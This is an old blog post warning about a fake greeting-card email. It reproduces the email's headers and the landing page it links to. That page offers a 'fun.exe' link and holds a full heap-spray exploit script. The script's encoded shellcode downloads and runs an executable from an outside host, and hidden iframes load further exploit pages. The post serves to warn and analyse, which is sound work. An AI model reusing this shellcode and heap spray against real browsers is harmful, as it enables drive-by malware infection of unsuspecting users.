Monica—To view this greeting card...

This is a new way to send people a virus. The good thing (if I may say) is that the virus does not get directly in your mailbox. But people who follow the link thinking: wow! I received a card, certainly do see a card at the end. But it is a virus. This only affects MS-Windows (big surprise) but hey... it's still is a virus. What kind, I don't know and it really doesn't matter to me. Just watch out for yourself!

Note that I removed the incoming email since it can very well be a legitimate email address that the virus used to email me.


Return-Path:		<???@gorudedude.com>
X-Original-To:		alexis@halk.m2osw.com
Delivered-To:		alexis@halk.m2osw.com
Received:		from snap.turnwatcher.com (colo [168.150.251.50])
			by halk.m2osw.com (Postfix) with ESMTP id 099641BDE2
			for <alexis@halk.m2osw.com>; Sat, 16 Jun 2007 11:25:37 -0700 (PDT)
Received:		from adsl201-232-58-231.epm.net.co (adsl201-232-58-231.epm.net.co [201.232.58.231])
			by snap.turnwatcher.com (Postfix) with SMTP id F1D7226ACFA
			for <alexis@m2osw.com>; Sat, 16 Jun 2007 11:25:26 -0700 (PDT)
Received:		from uijg.paix ([94.153.159.126]) by adsl201-232-58-231.epm.net.co with Microsoft
			SMTPSVC(6.0.3790.1830); Sat, 16 Jun 2007 13:22:22 -0500
Message-ID:		<002d01c7b043$4859f1a0$7e9f995e@uijg.paix>
From:			"Monica" <???@gorudedude.com>
To:			<alexis@m2osw.com>
Subject:		Monica sent you a wtargue.hk! Greeting
Date:			Sat, 16 Jun 2007 13:22:22 -0500
MIME-Version:		1.0
Content-Type:		text/plain; format=flowed; charset="Windows-1252"; reply-type=original
X-Priority:		3
X-MSMail-Priority:	Normal
X-Mailer:		Microsoft Outlook Express 5.50.4133.2578
X-MimeOLE:		Produced By Microsoft MimeOLE V5.50.4133.2578


Surprise! You've just received a wtargue.hk! Greeting
from from "Monica" ()!

To view this greeting card, click on the following
Web address at anytime within the next 30 days.

http://wtargue.hk/?368412571d7d41977bc649ea95523893748ae56

Enjoy!

The wtargue.hk! Greetings Team 

When following the link, I get this index page:

<html>
<body>
<script>
document.write(unescape("%3c%73%63%72...%72%69%70%74%3e"));
</script>
<script>
document.write(unescape("%3c%69%66%72...%79%6c%65%3e%0a"));
</script>
Download should start automatically. If you experience any problems, please try using
the <a href="http://zlnewly.hk/fun.exe">direct link</a>.
</body>
</html>

The unescape have been shorten here because these are quite long. The result is pretty evident since you are offered to follow the direct link to that fun.exe virus.

The first script goes like this:

<script>
try{x=unescape("%u9090%u9090%u9090%u9090%u00e8%u0000%u5d00%ued81%u11ce%u0040%ucce8%u0000%u8d00%u5e85
		%u4012%ue800%u0007%u0000%u7275%u6d6c%u6e6f%ue800%u011e%u0000%uc389%u858d%u131e%u0040
		%u13e8%u0000%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54%u6946%u656c%u0041%ue853%u00f8
		%u0000%u9090%u8d8d%u127f%u0040%u006a%u006a%u09e8%u0000%u6300%u5c3a%u2e74%u6e69%u0078
		%u6a51%uff00%u8dd0%u6b85%u4012%u6a00%ue800%u0009%u0000%u3a63%u745c%u692e%u786e%ue800
		%u00be%u0000%u858d%u1273%u0040%u006a%ub1e8%u0000%u4c00%u616f%u4c64%u6269%u6172%u7972
		%u0041%u6957%u456e%u6578%u0063%u7845%u7469%u7250%u636f%u7365%u0073%u7468%u7074%u2f3a
		%u7a2f%u657a%u7361%u2e65%u6f63%u2f6d%u796d%u2e6e%u7865%u0065%u0000%u0000%u0000%u0000
		%u0000%u0000%u6000%u8b64%u301d%u0000%u8b00%u0c5b%u5b8b%u8b1c%u8b1b%u085b%uda89%u9d89
		%u132d%u0040%u7b8b%u013c%u03d7%u785f%u4b8b%u8b18%u2073%u7b8b%u0124%u01d6%ufcd7%u01ad
		%u51d0%u9657%ubd8d%u131e%u0040%u0fb9%u0000%uf300%u96a6%u595f%u0674%u4747%ue4e2%uc4eb
		%uc031%u8b66%uc107%u02e0%u738b%u011c%u01d6%uadc6%ud001%u8589%u1331%u0040%uc361%uff50
		%u2db5%u4013%uff00%u3195%u4013%uff00%u47e0%u7465%u7250%u636f%u6441%u7264%u7365%u0073
		%u0000%u0000%u0000%u0000");y=unescape("%u0d0d%u0d0d");while(y.length<0x40000)y+=y;
		y=y.substring(0,0x3ffe4-x.length);o=new Array();for(i=0;i<450;i++)o[i]=y+x;
		z=Math.ceil(0xd0d0d0d);
		document.write('<object classid="CLSID:EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F"><\/object>');
		z=document.scripts[0].createControlRange().length;}catch(e){}
</script>

This script makes absolutly no sense. So why such a script? Well... the one main thing I can see in that script is a cheer size of the buffer generated by the while(y.length < 0x40000). This is big and it is not unlikely that this plus the array generate the execution of unwanted code when the script access the length of the createControlRange() function. Anyway, I won't try it!

The second script creates frames as follow:

<iframe src="exp1.htm" width="1" height="1"></iframe>
<iframe src="exp2.htm" width="1" height="1"></iframe>
<iframe src="exp3.htm" width="1" height="1"></iframe>
<style> * {CURSOR: url("123.htm")} </style>

I tried to get the 123.htm entry wondering what that cursor could possibly look like. I got a Error 404: Not Found.